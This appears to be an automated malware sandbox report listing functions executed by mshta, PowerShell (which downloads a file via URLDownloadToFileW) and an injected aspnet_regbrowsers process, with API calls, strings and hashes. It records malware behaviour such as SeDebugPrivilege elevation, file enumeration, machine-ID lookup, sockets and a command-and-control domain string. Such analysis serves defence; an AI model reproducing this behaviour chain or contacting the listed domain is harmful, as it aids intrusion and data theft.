Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 029D0FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.463003055.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_29d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 029D0FA1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.463003055.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_29d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 029D0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.463003055.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_29d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 3944, Parent PID: 3848COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 000007FE89A04B18 Relevance: 1.6, APIs: 1, Instructions: 129
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON ref: 000007FE89A05B00

Memory Dump Source

Source File: 00000005.00000002.520571277.000007FE89A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe89a00000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 0e426874c081b4db45a1fe9f0665bb7e3c36cd27da582a770319fdc14598414b
Instruction ID: ebd9a5ce895f68206e477b3937b1217052628dc34e0a8dfc34020263b7bd3a1c
Opcode Fuzzy Hash: 0e426874c081b4db45a1fe9f0665bb7e3c36cd27da582a770319fdc14598414b
Instruction Fuzzy Hash: 23319031908A0C8FDB58DF5C98897A9BBE1FB69311F00826ED04ED3651CB70A845CB81

Function 000007FE89A059F1 Relevance: 1.7, APIs: 1, Instructions: 159
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON ref: 000007FE89A05B00

Memory Dump Source

Source File: 00000005.00000002.520571277.000007FE89A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe89a00000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 5e59e8b10a72a0aa8c727c5273a5b5f4e79558804f2091dd6c9613c7c211d229
Instruction ID: cb074e1a4b143c5f0c542b91451b83ec977fcf712b1fbd1b91fc414deed79253
Opcode Fuzzy Hash: 5e59e8b10a72a0aa8c727c5273a5b5f4e79558804f2091dd6c9613c7c211d229
Instruction Fuzzy Hash: B241E23191CB889FDB1ADB5898487E9BBF0FB66321F0482AFD089D3152CB646846C791

Function 000007FE89AD26E9 Relevance: .7, Instructions: 711
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.520654537.000007FE89AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe89ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c37bb654c2b82888d0cc64185fc248188e3c552fed1286ae564aaabe794a9cc
Instruction ID: 65a68241c5234fcf069ecc155ac404758362386f3a5fc6da72771080f630a766
Opcode Fuzzy Hash: 3c37bb654c2b82888d0cc64185fc248188e3c552fed1286ae564aaabe794a9cc
Instruction Fuzzy Hash: E422163090CB894FE79ADB2C94506797BE2FF9A344F2401EED44EC72A3DA25AC56C741

Function 000007FE89AD0F0D Relevance: .3, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.520654537.000007FE89AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe89ad0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f94bc3bf8c2bb0961f6f93dd5de84350728614960e821cd92a7850c4583c545
Instruction ID: 2a61d2119196e51b4371269a920fe9837bde49110811efd67e6d70d14e97095c
Opcode Fuzzy Hash: 4f94bc3bf8c2bb0961f6f93dd5de84350728614960e821cd92a7850c4583c545
Instruction Fuzzy Hash: 21A1E120A0DBCA0FE747973C58642657FE1EF57254B2900EBD48DCB1A3D5189C5AC362

Analysis Process: mshta.exePID: 3164, Parent PID: 564COMMON

Executed Functions

Function 03900FB1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000003.487052744.0000000003900000.00000010.00000800.00020000.00000000.sdmp, Offset: 03900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_3900000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: bf534c5d5e079a43775a56ef84fc6a4a5edc9a47472590f70e00e45a97898221
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Function 03900FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000003.487052744.0000000003900000.00000010.00000800.00020000.00000000.sdmp, Offset: 03900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_3900000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: bf534c5d5e079a43775a56ef84fc6a4a5edc9a47472590f70e00e45a97898221
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Function 03900FA1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000003.487052744.0000000003900000.00000010.00000800.00020000.00000000.sdmp, Offset: 03900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_3900000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: bf534c5d5e079a43775a56ef84fc6a4a5edc9a47472590f70e00e45a97898221
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Function 03900FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000003.487052744.0000000003900000.00000010.00000800.00020000.00000000.sdmp, Offset: 03900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_3900000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: bf534c5d5e079a43775a56ef84fc6a4a5edc9a47472590f70e00e45a97898221
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Function 03900FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000003.487052744.0000000003900000.00000010.00000800.00020000.00000000.sdmp, Offset: 03900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_3900000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: bf534c5d5e079a43775a56ef84fc6a4a5edc9a47472590f70e00e45a97898221
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Analysis Process: aspnet_regbrowsers.exePID: 3900, Parent PID: 3804COMMON

Execution Graph

Execution Coverage:	28.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	1845
Total number of Limit Nodes:	99

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA
Program Files, xrefs: 00403E01
%s\*, xrefs: 00403D99

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 4bf4f5d537e0fb4440aa84fa95ff9fbaec45dc738c26a4351b82ac916622dd20
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 4bf4f5d537e0fb4440aa84fa95ff9fbaec45dc738c26a4351b82ac916622dd20
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Function 004061C3 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: _wmemset$AccountErrorInformationLastLookupToken
String ID: IDA$IDA
API String ID: 3235442692-2020647798
Opcode ID: b2ae47ba8f41fed610fef6eab258e0ae4dc6551deef85bf4ce41cfc9478809f5
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: b2ae47ba8f41fed610fef6eab258e0ae4dc6551deef85bf4ce41cfc9478809f5
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 0041284A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C

Strings

5,A, xrefs: 0041284A

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Path
String ID: 5,A
API String ID: 2875597873-3842761921
Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

